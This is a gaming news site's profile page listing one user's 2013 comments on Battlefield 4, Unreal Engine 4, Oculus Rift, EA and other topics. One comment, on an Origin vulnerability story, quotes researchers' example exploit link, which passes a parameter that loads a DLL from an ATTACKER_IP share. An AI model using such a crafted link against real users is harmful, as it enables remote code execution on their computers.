Send News. Want a reply? Read this. More in the FAQ.   News Forum - All Forums - Mobile - PDA - RSS Headlines  RSS Headlines   Twitter  Twitter
Customize
User Settings
Styles:
LAN Parties
Upcoming one-time events:

Regularly scheduled events

User information for Danger Dog

Real Name Danger Dog   
Search for:

Sort results:   Ascending Descending
Limit results:

Nickname DangerDog
Email Concealed by request
ICQ None given.
Description
Homepage http://
Signed On Jul 12, 2000, 17:57
Total Comments 4295 (Master)
User ID 6174

User comment history
< Newer [ 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 ] Older >

News Comments > Rising Storm GDC Trailer
1. Re: Rising Storm GDC Trailer Mar 26, 2013, 21:53 DangerDog

I wish them luck but I won't be picking this one up, WWII pacific theater isn't my thing.

Reply Quote Edit Delete Report

News Comments > Ships Ahoy - Battlefield 3 End Game
2. Re: Ships Ahoy - Battlefield 3 End Game Mar 26, 2013, 21:47 DangerDog

Hmm I like the maps in conquest, ctf really depends on how much teamwork is taking place. The rush mode for the maps are lacking.

anyways

EA has confirmed with us Battlefield 4 will be available for pre-order starting at 10pm PST on Tuesday, March 26, 2013 on the digital-distribution site Origin.

Along with the news of the standard edition being available for pre-order, the ‘Digital Deluxe Edition’ was also detailed. The DDE will include “access to the Exclusive Battlefield 4 Beta, Bonus Content, as well as the a Battlefield 4 Premium Expansion Pack” according to EA. The Digital Deluxe Edition is available exclusively on Origin.

Fans will be able to pre-order their copies of Battlefield 4 later this evening. We will have more information on the exact contents of the digital offerings when it is made available by EA.

Although the promotion is not live as of yet, it will be at 10pm PST.

News Comments > Unreal Engine 4 Teaser
21. Re: Unreal Engine 4 Teaser Mar 25, 2013, 15:38 DangerDog

Beamer wrote on Mar 25, 2013, 15:16:
KilrathiAce wrote on Mar 25, 2013, 14:03:
Ue3 sucked so they better step up here.

What didn't you like and what engines did you feel were better?

Or is this one of those standard "UE3 sucks but I have nothing to back it up with" arguments?

Let's start with texture pop-up, very few games that used the engine properly dealt with that issue.

You really have to work hard to remove the feeling that you're playing a mod for Unreal Tournament 3 and way too many games just felt like lazy game developers recycling the included assets with the dev kit over and over again.

The physics in the engine always felt like a "good enough" check box feature and always tainted games in a bad way, most egregiously with anything trying to implement vehicles were just plain awful 90% of the time.

Those are some of my gripes, I can only think of a few games that overcame the deficiencies - Mirrors Edge for example and DICE replaced a lot of the subsystems included by default. Just replacing the lighting was a huge improvement.

News Comments > Unreal Engine 4 Teaser
17. Re: Unreal Engine 4 Teaser Mar 25, 2013, 14:28 DangerDog

More graphics fluff that you'll want to disable in some .ini buried in the install folder.

They're really going to push tessellation as a massive, huge deal because console gamers haven't experienced it at all.

meanwhile the enemy AI will still respond like a box of rocks.

News Comments > Call to Arms Trailer
1. Re: Call to Arms Trailer Mar 24, 2013, 23:41 DangerDog

I think I'll wait till company of heroes goes modern  

News Comments > Researchers: Battlefield Play4Free Vulnerable
5. Re: Researchers: Battlefield Play4Free Vulnerable Mar 24, 2013, 04:07 DangerDog

jacobvandy wrote on Mar 23, 2013, 17:24:
It's because they locked EVERYTHING behind that smarmy freemium 'progression.' You have to spend a few hours playing just to unlock the ability to have and use a hand grenade...

It was more than that, the graphics were so effed up and the player movement felt really bad. Massive step back from BF2.

It's like all these games that have been released since the original Tribes came out, none of them could get the skiing down to the way it was - even Tribes 2 felt sluggish to the original. If you can't nail down the player movement then everything from there on out is going to be crap.

This comment was edited on Mar 24, 2013, 04:13.

News Comments > Researchers: Battlefield Play4Free Vulnerable
2. Re: Researchers: Battlefield Play4Free Vulnerable Mar 23, 2013, 15:36 DangerDog

I don't know how they could have made the free2play version worse than Battlefield 2 but they did.

I played probably two or three rounds before uninstalling.

Ben Cousins was an idiot, I'm glad he left DICE.

News Comments > Battlefield 4 Teaser Trailer
20. Re: Battlefield 4 Teaser Trailer Mar 21, 2013, 16:13 DangerDog

Game of the year, before it's even released!

http://i.imgur.com/KIpaH6w.png

News Comments > Evening Interviews
1. Re: Evening Interviews Mar 21, 2013, 03:09 DangerDog

Adam had a good run at it, I imagine they kicked him to the curb because he was getting too old. Media is a youth centric culture.  

News Comments > Morning Consolidation
8. Re: Morning Consolidation Mar 20, 2013, 15:27 DangerDog

where do I plug my mouse and keyboard in?

is that all seeing green eye/orb really what it's going to look like?

News Comments > Battlefield 4 Trailer Tease
38. Re: Battlefield 4 Trailer Tease Mar 19, 2013, 19:52 DangerDog

I think there's a lot of cheating but very few are so blatant about it that it's beyond obvious.  

News Comments > Battlefield 4 Trailer Tease
36. Re: Battlefield 4 Trailer Tease Mar 19, 2013, 19:15 DangerDog

bigspender wrote on Mar 19, 2013, 19:07:
256 players at least plz

No, more players and bigger maps does not make a better experience.

News Comments > Origin Vulnerable to Remote Execution
9. Re: Origin Vulnerable to Remote Execution Mar 19, 2013, 04:07 DangerDog

The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer

so you need to have an "evil" dll installed on your system, and click on a malformed link to get the code executed.

I'm not going to lose any sleep over that one, people trying to run pirated Origin games beware though - so easy to sneak a dll into the install.

News Comments > Team Fortress 2 Adding Occulus Rift Support
9. Re: Team Fortress 2 Adding Occulus Rift Support Mar 19, 2013, 03:57 DangerDog

Asmo wrote on Mar 19, 2013, 01:02:
So to add OR support, you essentially have to create an extra controllable freelook "head" for the character independent of mouselook (ie. where you are aiming/turning)and body movement (WASD for lack of a better term)?

I'm just curious because I can see how this would work for a game like MWO, space games or flight sims etc where you have a fixed seated viewpoint, as opposed to FPS etc where your in game body moves within the environment. I think having your gun slaved to a reticule on the OR would cause some confusion between body movement and head movement. Not to mention that you can snap turn with a mouse but won't be able to turn more 90 degrees from center before your neck starts a lawsuit against you.

Be interesting to see how it turns out.

The main problem will be motion blur which I understand they've improved from the early prototype but not completely. This isn't really a game that can benefit from free-look. Arma games have the detached camera from head and you can go watch TrackIR demos showing off the use of such a system.

You may be able to just lock the camera and use it as a stereoscopic, fixed image display.

I don't think they've solved the depth movement issue which would allow you to zoom in for a closer look at an instrument panel in a flight sim for example. I'm not even sure if they track Z axis - yet.

News Comments > Giant Aliens: Colonial Marines Patch
13. Re: Giant Aliens: Colonial Marines Patch Mar 19, 2013, 01:19 DangerDog

http://steamgraph.net/index.php?action=graph&appid=49540&from=1361040557

nose dive, boom right into the ground

News Comments > John Riccitiello Leaving EA
45. Re: John Riccitiello Leaving EA Mar 18, 2013, 19:10 DangerDog

ASeven wrote on Mar 18, 2013, 18:46:
Forbes throws the theory that Riccitello may have been pressured to quit due to the SimCity debacle.

Too far fetched for me, investors care about stock prices before botched releases, even one with the magnitude of SimCity. Riccitello pretty much threw EA's stock prices to the ground.

Doubtful, it's been a series of bad moves by EA though. I think the last hit game they released was Battlefield 3, in terms of sales but not profit.

There was also that incident last year where the barn doors of Origin were left wide open and people gobbled up the free games.

I'm not expecting anything to change much, EA games won't be showing back up on Steam for example. Microtransaction in games will persist. SimCity will still be tied to hamfisted DRM schemes.

News Comments > Oculus Rift Won't Include DOOM 3
19. Re: Oculus Rift Won't Include DOOM 3 Mar 18, 2013, 13:43 DangerDog

I'm going to hold out till they release it with a 1080p screen, you'll also need a beefy system + graphics card because they've said you'll need to have solid 60fps for the best experience. Really tough to do with Arma 3

long panel discussion at sxsw

https://www.youtube.com/watch?feature=player_embedded&v=SoeSEmPMl3o

basic summary: really cool device, requires rethinking of game design for pacing as fast quake games can cause motion sickness. They talk about unique ways to use controllers - even go off on some tangent about large empty rooms becoming a sort of holodeck type experience, may bring back "arcade" type locations to provide this kind of experience.

News Comments > SimCity Compensatory Games Revealed
3. Re: SimCity Compensatory Games Revealed Mar 18, 2013, 13:30 DangerDog

Hopefully they all pick Medal of Honor Warfighter, one failed game to replace another failed game.  

News Comments > Sunday Q&As
3. Re: Sunday Q&As Mar 17, 2013, 23:06 DangerDog

I think he takes too much credit for himself, tries to hard to present himself as an innovator and then fails to deliver on what he blathers on about.

In the first few minutes of the video he goes on about how he wants to break the mold from linear environments and brain dead NPC's etc but that's exactly what Bioshock turned into. It only excelled in creating the illusion of a vibrant world through the atmosphere of the setting. The early demo of the game looked much better than what eventually was released, hmmm sort of like what Randy did with Aliens Colonial Marines.

That's just my opinion, I'm sure to ardent fans of his he can do no wrong.

News Comments > Sunday Q&As
1. Re: Sunday Q&As Mar 17, 2013, 16:19 DangerDog

Just short of 2 hours of Ken Levine's super ego on stage.

I still remember this developer walkthrough of Bioshock 1

https://www.youtube.com/watch?v=tc6PUCr_WtQ

Not quite on the level of Randy Pitchford lies but pretty close.

4295 Comments. 215 pages. Viewing page 47.
< Newer [ 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 ] Older >

footer

Blue's News logo